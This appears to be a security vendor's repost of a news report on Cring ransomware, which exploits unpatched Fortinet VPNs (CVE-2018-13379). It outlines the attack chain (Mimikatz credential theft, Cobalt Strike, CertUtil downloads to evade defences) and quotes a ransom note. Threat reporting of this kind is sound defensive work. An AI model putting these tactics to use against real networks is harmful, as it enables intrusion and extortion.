fbpx
Frame-14

Privacy Ninja

        • DATA PROTECTION

        • CYBERSECURITY

        • Penetration Testing

          Secure your network against various threat points. VA starts at only S$1,000, while VAPT starts at S$4,000. With Price Beat Guarantee!

        • API Penetration Testing
        • Enhance your digital security posture with our approach that identifies and addresses vulnerabilities within your API framework, ensuring robust protection against cyber threats targeting your digital interfaces.

        • On-Prem & Cloud Network Penetration Testing
        • Boost your network’s resilience with our assessment that uncovers security gaps, so you can strengthen your defences against sophisticated cyber threats targeting your network

        • Web Penetration Testing
        • Fortify your web presence with our specialised web app penetration testing service, designed to uncover and address vulnerabilities, ensuring your website stands resilient against online threats

        • Mobile Penetration Testing
        • Strengthen your mobile ecosystem’s resilience with our in-depth penetration testing service. From applications to underlying systems, we meticulously probe for vulnerabilities

        • Cyber Hygiene Training
        • Empower your team with essential cybersecurity knowledge, covering the latest vulnerabilities, best practices, and proactive defence strategies

        • Thick Client Penetration Testing
        • Elevate your application’s security with our thorough thick client penetration testing service. From standalone desktop applications to complex client-server systems, we meticulously probe for vulnerabilities to fortify your software against potential cyber threats.

        • Source Code Review
        • Ensure the integrity and security of your codebase with our comprehensive service, meticulously analysing code quality, identifying vulnerabilities, and optimising performance for various types of applications, scripts, plugins, and more

        • Email Spoofing Prevention
        • Check if your organisation’s email is vulnerable to hackers and put a stop to it. Receive your free test today!

        • Email Phishing Excercise
        • Strengthen your defense against email threats via simulated attacks that test and educate your team on spotting malicious emails, reducing breach risks and boosting security.

        • Cyber Essentials Bundle
        • Equip your organisation with essential cyber protection through our packages, featuring quarterly breached accounts monitoring, email phishing campaigns, cyber hygiene training, and more. LAUNCHING SOON.

New Cring Ransomware Hits Unpatched Fortinet VPN Devices

New Cring Ransomware Hits Unpatched Fortinet VPN Devices

A vulnerability impacting Fortinet VPNs is being exploited by a new human-operated ransomware strain known as Cring to breach and encrypt industrial sector companies’ networks.

Cring ransomware (also known as Crypt3r, Vjiszy1lo, Ghost, Phantom) was discovered by Amigo_A in January and spotted by the CSIRT team of Swiss telecommunications provider Swisscom.

The Cring operators drop customized Mimikatz samples, followed by CobaltStrike after gaining initial access and deploy the ransomware payloads by downloading using the legitimate Windows CertUtil certificate manager to bypass security software.

As Kaspersky researchers revealed in a report published today, the attackers exploit Internet-exposed Fortigate SSL VPN servers unpatched against the CVE-2018-13379 vulnerability, which allows them to breach their targets’ network.

“Victims of these attacks include industrial enterprises in European countries,” Kaspersky researchers said.

“At least in one case, an attack of the ransomware resulted in a temporary shutdown of the industrial process due to servers used to control the industrial process becoming encrypted.”

Cring ransomware attacks

From the Fortinet VPN appliance, Cring operators move laterally on the targets’ enterprise network stealing Windows user credentials using Mimikatz to gain control of the domain administrator account.

The ransomware payloads are then delivered to devices on the victims’ networks using the Cobalt Strike threat emulation framework deployed using a malicious PowerShell script.

Cring ransomware attack flow
Cring ransomware attack flow (Kaspersky)

Also Read: Compliance Course Singapore: Spotlight On The 3 Offerings

The ransomware encrypts only specific files on the compromised devices using strong encryption algorithms (RSA-8192 + AES-128) after removing backup files and killing Microsoft Office and Oracle Database processes.

It then drops ransom notes named !!!!!readme.rtf and deReadMe!!!.txt warning the victims that their network was encrypted and that they need to hurry to pay the ransom because the decryption key will not be kept indefinitely.

Sorry, your network is encrypted, and most files are encrypted using special technology. The file cannot be recovered by any security company. If you do not believe that you can even consult a security company, your answer will be that you need to pay the corresponding fees, but we have a good reputation. After receiving the corresponding fee, we will immediately send the decryption program and KEY. You can contact us to get two file decryption services, and then you will get all decryption services after paying our fee, usually the cost is about 2 bitcoins.

Contact: [email protected]  [email protected]

Victims have been using the ID-Ransomware service to check if their systems were hit by Cring ransomware since the operation first surfaced in December 2020.

30 Cring ransomware samples have been submitted so far, with at least one per day since the end of January.

Cring ransomware activity
Cring ransomware activity (ID-Ransomware)

Indicators of compromise (IOCs), including malware sample hashes, C2 server IP addresses, and malware-hosting server addresses, are available at the end of Kaspersky’s report.

Fortinet products targeted by APT and cybercrime groups

The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) warned earlier this week of advanced persistent threat (APT) actors scanning for Fortinet SSL VPN appliances vulnerable to CVE-2018-13379 exploits.

The joint advisory also warns of attackers enumerating servers unpatched against CVE-2020-12812 and CVE-2019-5591.

As shown by previous campaigns, any servers compromised during these infiltration attempts might be used in future attacks as initial access vectors to breach government or commercial organizations’ networks.

“The APT actors may be using any or all of these CVEs to gain access to networks across multiple critical infrastructure sectors to gain access to key networks as pre-positioning for follow-on data exfiltration or data encryption attacks,” the agencies warned.

“APT actors have historically exploited critical vulnerabilities to conduct distributed denial-of-service (DDoS) attacks, ransomware attacks, structured query language (SQL) injection attacks, spearphishing campaigns, website defacements, and disinformation campaigns.”

State hackers abused the CVE-2018-13379 vulnerability in the past to compromise U.S. election support systems reachable over the Internet.

Fortinet also warned customers to patch their appliances against the CVE-2018-13379 in August 2019July 2020November 2020, and again in April 2021.

Also Read: Considering Enterprise Risk Management Certification Singapore? Here Are 7 Best Outcomes

“The security of our customers is our first priority. CVE-2018-13379 is an old vulnerability resolved in May 2019,” Fortinet told BleepingComputer earlier this week. “If customers have not done so, we urge them to immediately implement the upgrade and mitigations.”

0 Comments

KEEP IN TOUCH

Subscribe to our mailing list to get free tips on Data Protection and Data Privacy updates weekly!

Personal Data Protection

REPORTING DATA BREACH TO PDPC?

We have assisted numerous companies to prepare proper and accurate reports to PDPC to minimise financial penalties.
×

Hello!

Click one of our contacts below to chat on WhatsApp

× Chat with us